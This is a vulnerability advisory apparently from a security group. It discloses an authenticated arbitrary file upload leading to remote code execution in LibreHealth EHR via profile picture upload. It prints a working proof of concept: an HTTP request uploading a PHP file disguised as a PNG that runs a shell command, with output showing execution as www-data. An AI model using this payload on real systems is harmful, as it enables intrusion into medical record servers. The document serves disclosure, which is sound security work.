0dd - The Zero (0) Day Division

The Zero (0) Day Division is a group of security professionals working towards a common goal; securing open-source projects.

LH-EHR RCE Via Picture Upload

The Issue

Arbitrary file upload vulnerability allowing any user who can set profile pictures to be able to execute code on the hosting system. In lh-ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this.

Issue location

Occurs at https://github.com/LibreHealthIO/lh-ehr/blob/5b5f427c4742f901e426f17325fb0aaf8209e0bb/interface/patient_file/summary/demographics.php#L1735


POST /lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------216243089528218
Content-Length: 252
Cookie: LibreHealthEHR=e2hroqj4n8d8odrds55bes4ui2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Disposition: form-data; name="profile_picture"; filename="T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php"
Content-Type: image/png
<?php echo `id`; ?>
ubuntu@ubuntu:/var/www/html/lh-ehr/profile_pictures$ curl
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Disclosure Timeline

  • Issue Reported: 11th August 2018
  • Issue Resolved: <TBD>
  • Blog Post Published: 3rd September 2018